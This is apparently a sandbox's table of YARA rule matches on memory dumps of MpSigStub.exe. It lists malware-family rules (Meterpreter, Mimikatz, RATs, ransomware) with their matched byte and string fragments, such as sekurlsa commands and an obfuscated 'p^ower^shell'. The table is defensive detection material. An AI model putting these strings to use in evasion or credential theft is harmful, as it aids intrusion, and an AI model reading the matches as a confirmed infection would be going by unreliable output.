36.3.MpSigStub.exe.197a3578ac5.153.unpack	APT_Backdoor_Win_DShell_3	This rule looks for strings specific to the D programming language in combination with sections of an integer array which contains the encoded payload found within DShell	FireEye	0xd7757:$dlang1: C:\D\dmd2\windows\bin\..\..\src\phobos\std\utf.d 0xd778c:$dlang2: C:\D\dmd2\windows\bin\..\..\src\phobos\std\file.d 0xd77c2:$dlang3: C:\D\dmd2\windows\bin\..\..\src\phobos\std\format.d 0xd77fa:$dlang4: C:\D\dmd2\windows\bin\..\..\src\phobos\std\base64.d 0xd7832:$dlang5: C:\D\dmd2\windows\bin\..\..\src\phobos\std\stdio.d 0xd776c:$dlang6: \..\..\src\phobos\std\utf.d 0xd7869:$dlang6: \..\..\src\phobos\std\utf.d 0xd77a1:$dlang7: \..\..\src\phobos\std\file.d 0xd7889:$dlang7: \..\..\src\phobos\std\file.d 0xd77d7:$dlang8: \..\..\src\phobos\std\format.d 0xd78aa:$dlang8: \..\..\src\phobos\std\format.d 0xd780f:$dlang9: \..\..\src\phobos\std\base64.d 0xd78cd:$dlang9: \..\..\src\phobos\std\base64.d 0xd7847:$dlang10: \..\..\src\phobos\std\stdio.d 0xd78f0:$dlang10: \..\..\src\phobos\std\stdio.d 0xd7912:$dlang11: Unexpected '\n' when converting from type const(char)[] to type int 0x1b910:$e0: ,0, 0xd795a:$e0: ,0, 0xd795c:$e1: ,1, 0xd795e:$e2: ,2, 0xd7960:$e3: ,3,
36.3.MpSigStub.exe.197a3578ac5.153.unpack	SUSP_Microsoft_7z_SFX_Combo	Detects a suspicious file that has a Microsoft copyright and is a 7z SFX	Florian Roth	0x37ddd:$s1: 7ZSfx%03x.cmd 0x21702:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x2234a:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x22ef6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x23ae6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0x246f6:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xa8c76:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xd2365:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xd4799:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe02ed:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ... 0xe2965:$c1: 00 4C 00 65 00 67 00 61 00 6C 00 43 00 6F 00 70 00 79 00 72 00 69 00 67 00 68 00 74 00 00 00 A9 00 20 00 4D 00 69 00 63 00 72 00 6F 00 73 00 6F 00 66 00 74 00 20 00 43 00 6F 00 72 00 70 00 6F ...
36.3.MpSigStub.exe.197a3578ac5.153.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a31eb36e.135.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a31eb36e.135.unpack	JoeSecurity_Winexe_tool	Yara detected Winexe tool	Joe Security
36.3.MpSigStub.exe.197a31eb36e.135.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x16e8ea:$xs1: WS2_32.dll 0xcc24:$xs2: ReflectiveLoader 0x47b3b5:$xs2: ReflectiveLoader
36.3.MpSigStub.exe.197a497a30f.132.unpack	Base64_PS1_Shellcode	Detects Base64 encoded PS1 Shellcode	Nick Carr, David Ledbetter	0x4fe1e0:$substring: AAAAYInlM 0x4fe1dc:$pattern1: /OiCAAAAYInlM
36.3.MpSigStub.exe.197a497a30f.132.unpack	SUSP_PowerShell_Caret_Obfuscation_2	Detects powershell keyword obfuscated with carets	Florian Roth	0x335a82:$r2: p^ower^shell
36.3.MpSigStub.exe.197a497a30f.132.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0xcc24:$x1: ReflectiveLoader 0x47b3b5:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a497a30f.132.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0xdd0d7:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
36.3.MpSigStub.exe.197a497a30f.132.unpack	SUSP_Script_Obfuscation_Char_Concat	Detects strings found in sample from CN group repo leak in October 2018	Florian Roth	0x3d10e0:$s1: "c" & "r" & "i" & "p" & "t"
36.3.MpSigStub.exe.197a497a30f.132.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0xcdd43:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xcdd9e:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xce0ea:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xce145:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0xd03ec:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
36.3.MpSigStub.exe.197a497a30f.132.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0xee8bd:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0xee8df:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
36.3.MpSigStub.exe.197a497a30f.132.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x52ed1:$s2: sekurlsa::wdigest 0x52e02:$s6: sekurlsa::livessp 0x52e47:$s9: sekurlsa::process 0x52e8c:$s12: sekurlsa::tickets 0x52dbd:$s15: sekurlsa::credman
36.3.MpSigStub.exe.197a497a30f.132.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x1a2c2d:$1: comms.BeaconData 0x1a2c42:$2: comms.CommandResponse 0x1a2c5c:$3: rat.BaseChannel 0x1a2c70:$4: rat.Config 0x1a2c7f:$5: rat.Core 0x1a2c8c:$6: platforms.AgentPlatform 0x1a2ca8:$7: GetHostID 0x1a2cb6:$8: /rat/cmd/gorat_shared/dllmain.go
36.3.MpSigStub.exe.197a497a30f.132.unpack	CredTheft_MSIL_ADPassHunt_2	unknown	FireEye	0x2e7367:$pdb1: \ADPassHunt\ 0x2e7378:$pdb2: \ADPassHunt.pdb 0x2e738c:$s1: Usage: .\ADPassHunt.exe 0x2e73a8:$s2: [ADA] Searching for accounts with msSFU30Password attribute 0x2e73e8:$s3: [ADA] Searching for accounts with userpassword attribute 0x2e7425:$s4: [GPP] Searching for passwords now
36.3.MpSigStub.exe.197a497a30f.132.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x23130c:$one6: Shell Environ$("COMSPEC") & " /c 0x2313d3:$one6: Shell Environ$("COMSPEC") & " /c 0x231956:$one6: Shell Environ$("COMSPEC") & " /c 0x231977:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x231909:$two5: NullRefrencedException 0x231921:$two6: error has occurred in user32.dll by 0x231909:$two7: NullRefrencedException
36.3.MpSigStub.exe.197a497a30f.132.unpack	Typical_Malware_String_Transforms	Detects typical strings in a reversed or otherwise modified form	Florian Roth	0x4173d2:$r1: teSlortnoCtnerruC
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Meterpreter	Yara detected Meterpreter	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_MetasploitPayload_3	Yara detected Metasploit Payload	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_MegaCortex	Yara detected MegaCortex Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_CosturaAssemblyLoader	Yara detected Costura Assembly Loader	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
36.3.MpSigStub.exe.197a497a30f.132.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0xe0d0a:$: OnlineTime= 0xe0d48:$: clientpath= 0xe0d57:$: serverpath=
36.3.MpSigStub.exe.197a46f017a.26.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x29579:$x1: \Mini rat\
36.3.MpSigStub.exe.197a46f017a.26.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x3f8a7f:$xs1: WS2_32.dll 0x193320:$xs2: ReflectiveLoader 0x296db9:$xs2: ReflectiveLoader
36.3.MpSigStub.exe.197a46f017a.26.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x193320:$x1: ReflectiveLoader 0x296db9:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a46f017a.26.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x36726c:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
36.3.MpSigStub.exe.197a46f017a.26.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x32e10:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46f017a.26.unpack	Amplia_Security_Tool	Amplia Security Tool	unknown	0xfd25e:$a: Amplia Security 0xfd32b:$e: extract the TGT session key
36.3.MpSigStub.exe.197a46f017a.26.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x357ed8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x357f33:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35827f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3582da:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35a581:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
36.3.MpSigStub.exe.197a46f017a.26.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x378a52:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x378a74:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
36.3.MpSigStub.exe.197a46f017a.26.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x32e10:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46f017a.26.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2dd066:$s2: sekurlsa::wdigest 0x2dcf97:$s6: sekurlsa::livessp 0x2dcfdc:$s9: sekurlsa::process 0x2dd021:$s12: sekurlsa::tickets 0x2dcf52:$s15: sekurlsa::credman
36.3.MpSigStub.exe.197a46f017a.26.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x42cdc2:$1: comms.BeaconData 0x42cdd7:$2: comms.CommandResponse 0x42cdf1:$3: rat.BaseChannel 0x42ce05:$4: rat.Config 0x42ce14:$5: rat.Core 0x42ce21:$6: platforms.AgentPlatform 0x42ce3d:$7: GetHostID 0x42ce4b:$8: /rat/cmd/gorat_shared/dllmain.go
36.3.MpSigStub.exe.197a46f017a.26.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xdeacc:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xde9a9:$rat2: rat.(Core).generateBeacon 0xde9c6:$rat3: rat.gJitter 0xde9d4:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xdea3a:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xdeaa2:$rat8: rat/modules/netsweeper.(Pinger).listen 0xdeacc:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xdeafa:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xde980:$winblows: rat/platforms/win.(winblows).GetStage
36.3.MpSigStub.exe.197a46f017a.26.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x33780:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46f017a.26.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x4bb4a1:$one6: Shell Environ$("COMSPEC") & " /c 0x4bb568:$one6: Shell Environ$("COMSPEC") & " /c 0x4bbaeb:$one6: Shell Environ$("COMSPEC") & " /c 0x4bbb0c:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x4bba9e:$two5: NullRefrencedException 0x4bbab6:$two6: error has occurred in user32.dll by 0x4bba9e:$two7: NullRefrencedException
36.3.MpSigStub.exe.197a46f017a.26.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x189097:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
36.3.MpSigStub.exe.197a46f017a.26.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x33780:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46f017a.26.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xfb5ce:$x1: donate.ssl.xmrig.com
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Nemty	Yara detected Nemty Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_CryLock	Yara detected CryLock ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Gocoder_3	Yara detected Gocoder ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Wannacry	Yara detected Wannacry ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_bitcoinminer	Yara detected BitCoin Miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Shellcode_Injector	Yara detected generic Shellcode Injector	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Cobra_Locker	Yara detected Cobra Locker ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Coinhive	Yara detected Coinhive miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_PasteDownloader	Yara detected PasteDownloader	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_Njrat	Yara detected Njrat	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	JoeSecurity_hidden_tear	Yara detected HiddenTear ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.26.unpack	malware_red_leaves_memory	Red Leaves C&C left in memory, use with Volatility / Rekall	David Cannings	0x36ae9f:$: OnlineTime= 0x36aedd:$: clientpath= 0x36aeec:$: serverpath=
36.3.MpSigStub.exe.197a46f017a.58.unpack	MiniRAT_Gen_1	Detects Mini RAT malware	Florian Roth	0x29579:$x1: \Mini rat\
36.3.MpSigStub.exe.197a46f017a.58.unpack	HKTL_Meterpreter_inMemory	Detects Meterpreter in-memory	netbiosX, Florian Roth	0x3f8a7f:$xs1: WS2_32.dll 0x193320:$xs2: ReflectiveLoader 0x296db9:$xs2: ReflectiveLoader
36.3.MpSigStub.exe.197a46f017a.58.unpack	ReflectiveLoader	Detects a unspecified hack tool, crack or malware using a reflective loader - no hard match - further investigation recommended	Florian Roth	0x193320:$x1: ReflectiveLoader 0x296db9:$x1: ReflectiveLoader
36.3.MpSigStub.exe.197a46f017a.58.unpack	REDLEAVES_DroppedFile_ImplantLoader_Starburn	Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT	USG	0x36726c:$XOR_Loop: 32 0C 3A 83 C2 02 88 0E 83 FA 08 7C 90 01 01 EB 90 01 01 BA 08 00 00 00 32 0C 3A 83 C2 02 88 0E 83 FA 10
36.3.MpSigStub.exe.197a46f017a.58.unpack	malware_sakula_xorloop	XOR loops from Sakula malware	David Cannings	0x0:$mz: MZ 0x32e10:$opcodes_decode_loop01: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46f017a.58.unpack	Amplia_Security_Tool	Amplia Security Tool	unknown	0xfd25e:$a: Amplia Security 0xfd32b:$e: extract the TGT session key
36.3.MpSigStub.exe.197a46f017a.58.unpack	IMPLANT_4_v5	BlackEnergy / Voodoo Bear Implant by APT28	US CERT	0x357ed8:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x357f33:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35827f:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x3582da:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1 0x35a581:$GEN_HASH: 0F BE C9 C1 C0 07 33 C1
36.3.MpSigStub.exe.197a46f017a.58.unpack	IMPLANT_5_v3	XTunnel Implant by APT28	US CERT	0x378a52:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8 0x378a74:$BYTES1: 0F AF C0 69 C0 07 00 00 00 2D 01 00 00 00 0F AF C9 39 C8
36.3.MpSigStub.exe.197a46f017a.58.unpack	RAT_Sakula	Detects Sakula v1.0 RAT	Airbus Defence and Space Cybersecurity CSIRT - Yoann Francou / NCC Group David Cannings	0x32e10:$opcodes2: 31 C0 8A 04 0B 3C 00 74 09 38 D0 74 05 30 D0 88 04 0B
36.3.MpSigStub.exe.197a46f017a.58.unpack	Mimikatz_Memory_Rule_1	Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures)	Florian Roth	0x2dd066:$s2: sekurlsa::wdigest 0x2dcf97:$s6: sekurlsa::livessp 0x2dcfdc:$s9: sekurlsa::process 0x2dd021:$s12: sekurlsa::tickets 0x2dcf52:$s15: sekurlsa::credman
36.3.MpSigStub.exe.197a46f017a.58.unpack	APT_Backdoor_Win_GORAT_5	unknown	FireEye	0x42cdc2:$1: comms.BeaconData 0x42cdd7:$2: comms.CommandResponse 0x42cdf1:$3: rat.BaseChannel 0x42ce05:$4: rat.Config 0x42ce14:$5: rat.Core 0x42ce21:$6: platforms.AgentPlatform 0x42ce3d:$7: GetHostID 0x42ce4b:$8: /rat/cmd/gorat_shared/dllmain.go
36.3.MpSigStub.exe.197a46f017a.58.unpack	APT_Backdoor_Win_GoRat_Memory	Identifies GoRat malware in memory based on strings.	FireEye	0xdeacc:$rat1: rat/modules/socks.(HTTPProxyClient).beacon 0xde9a9:$rat2: rat.(Core).generateBeacon 0xde9c6:$rat3: rat.gJitter 0xde9d4:$rat4: rat/comms.(protectedChannel).SendCmdResponse 0xdea3a:$rat6: rat/modules/latlisten.(latlistensrv).handleCmd 0xdeaa2:$rat8: rat/modules/netsweeper.(Pinger).listen 0xdeacc:$rat9: rat/modules/socks.(HTTPProxyClient).beacon 0xdeafa:$rat10: rat/platforms/win/dyloader.(memoryLoader).ExecutePluginFunction 0xde980:$winblows: rat/platforms/win.(winblows).GetStage
36.3.MpSigStub.exe.197a46f017a.58.unpack	HackTool_MSIL_SharpHound_3	The TypeLibGUID present in a .NET binary maps directly to the ProjectGuid found in the \'.csproj\' file of a .NET project. This rule looks for .NET PE files that contain the ProjectGuid found in the public SharpHound3 project.	FireEye	0x33780:$typelibguid1: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46f017a.58.unpack	Oilrig_IntelSecurityManager_macro	Detects OilRig malware	Eyal Sela (slightly modified by Florian Roth)	0x4bb4a1:$one6: Shell Environ$("COMSPEC") & " /c 0x4bb568:$one6: Shell Environ$("COMSPEC") & " /c 0x4bbaeb:$one6: Shell Environ$("COMSPEC") & " /c 0x4bbb0c:$one7: echo " & Chr(32) & cmd & Chr(32) & " > " & Chr(34) 0x4bba9e:$two5: NullRefrencedException 0x4bbab6:$two6: error has occurred in user32.dll by 0x4bba9e:$two7: NullRefrencedException
36.3.MpSigStub.exe.197a46f017a.58.unpack	HKTL_NET_GUID_CsharpAmsiBypass	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x189097:$typelibguid0: 4ab3b95d-373c-4197-8ee3-fe0fa66ca122
36.3.MpSigStub.exe.197a46f017a.58.unpack	HKTL_NET_GUID_SharpHound3	Detects c# red/black-team tools via typelibguid	Arnim Rupp	0x33780:$typelibguid0: a517a8de-5834-411d-abda-2d0e1766539c
36.3.MpSigStub.exe.197a46f017a.58.unpack	MAL_XMR_Miner_May19_1	Detects Monero Crypto Coin Miner	Florian Roth	0xfb5ce:$x1: donate.ssl.xmrig.com
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_cerber	Yara detected Cerber ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Buran	Yara detected Buran Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_gogoogle	Yara detected GoGoogle ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Codoso_Ghost	Yara detected Codoso Ghost	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Voidcrypt	Yara detected Voidcrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_GenericDropper	Yara detected Generic Dropper	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Xmrig	Yara detected Xmrig cryptocurrency miner	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Mailto	Yara detected Mailto ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Cryptolocker	Yara detected Cryptolocker ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_CoronaCrypt	Yara detected CoronaCrypt Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_MiniRAT	Yara detected Mini RAT	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_Clop	Yara detected Clop Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_NoCry	Yara detected NoCry Ransomware	Joe Security
36.3.MpSigStub.exe.197a46f017a.58.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
